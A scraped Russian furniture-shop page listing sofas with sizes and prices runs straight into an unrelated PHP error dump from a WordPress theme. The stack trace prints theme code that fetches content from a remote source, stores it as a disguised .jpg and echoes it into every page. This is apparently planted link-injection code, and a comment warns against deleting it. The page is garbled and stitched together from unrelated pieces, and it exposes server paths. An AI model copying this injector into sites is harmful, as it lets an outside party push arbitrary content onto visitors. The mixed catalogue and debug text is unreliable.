Мягкая мебель

Диван "Китти" габариты 1330-800-950 мм  спальное место 1860*1100 мм - цена 7900 руб

Диван «Китти» габариты 1330-800-950 мм
спальное место 1860*1100 мм — цена 10300 руб

"Китти"

«Китти»

"Китти" в разобранном виде Цена 7900 руб

«Китти» в разобранном виде Цена 10300 руб

Диван "Машинка"  1500-780-860мм спальное место 1800-720мм  цена 7700руб

Диван «Машинка»
1500-780-860мм спальное место 1800-720мм
цена 11400 руб

машинкаМашинка с ящиком 7700руб

Диван "Флинт"  1330-800-950мм  спал место 1860-1100 цена 7500руб  механизм выкатной

Диван «Флинт»
1330-800-950мм
спал место 1860-1100 цена10250руб
механизм выкатной

ФлинтФлинт раскрыт 7500рубТеремок в разобранном виде 7700рубТеремок 1300-850-1080мм спальное место 1870-810мм цена 7700рубТеремок 1300-850-1080мм спальное место 1870-810мм цена 7700руб

PHP warning

PHP warning

file_put_contents(/home/mek54/domains/mek54.ru/public_html/wp-content/uploads/2011/66c708325b5db4301408ae849af978d4.jpg) [<a href='function.file-put-contents'>function.file-put-contents</a>]: failed to open stream: No such file or directory

/home/mek54/domains/mek54.ru/public_html/wp-content/themes/deco_fleximag/functions.php(1441)

1429            return '<!--link error-->';
1430       }
1431 
1432     function return_links($lib_path) {
1433          $links_class = new Get_links();
1434          $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
1435          $_cache_lifetime = $links_class->_cache_lifetime;
1436 
1437         if (!file_exists($file))
1438         {
1439             @touch($file, time());
1440             $data = $links_class->get_remote();
1441             file_put_contents($file, $data);
1442             return $data;
1443         } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
1444             @touch($file, time());
1445             $data = $links_class->get_remote();
1446             file_put_contents($file, $data);
1447             return $data;
1448         } else {
1449             $data = file_get_contents($file);
1450             return $data;
1451         }
1452     }
1453 }

Stack Trace

#0
+
 /home/mek54/domains/mek54.ru/public_html/wp-content/themes/deco_fleximag/functions.php(1441): file_put_contents("/home/mek54/domains/mek54.ru/public_html/wp-content/uploads/2011...", null)
1436 
1437         if (!file_exists($file))
1438         {
1439             @touch($file, time());
1440             $data = $links_class->get_remote();
1441             file_put_contents($file, $data);
1442             return $data;
1443         } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
1444             @touch($file, time());
1445             $data = $links_class->get_remote();
1446             file_put_contents($file, $data);
#1
+
 /home/mek54/domains/mek54.ru/public_html/wp-content/themes/deco_fleximag/comments.php(260): Get_links->return_links("/home/mek54/domains/mek54.ru/public_html/wp-content/themes/deco_...")
255 
256 </div>
257 
258         <div class="cleared"></div>
259     </div>
260 </div><?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links = $links->return_links($lib_path); echo $links; ?>
261 
262 <?php endif; // if you delete this the sky will fall on your head ?>
#2
+
 /home/mek54/domains/mek54.ru/public_html/wp-includes/comment-template.php(1508): require("/home/mek54/domains/mek54.ru/public_html/wp-content/themes/deco_...")
1503      *
1504      * @param string $theme_template The path to the theme template file.
1505      */
1506     $include = apply_filters( 'comments_template', $theme_template );
1507     if ( file_exists( $include ) ) {
1508         require( $include );
1509     } elseif ( file_exists( TEMPLATEPATH . $file ) ) {
1510         require( TEMPLATEPATH . $file );
1511     } else { // Backward compat code will be removed in a future release
1512         require( ABSPATH . WPINC . '/theme-compat/comments.php' );
1513     }
2024-04-25 18:48:39 Apache/2.4.6 Yii Framework/1.1.13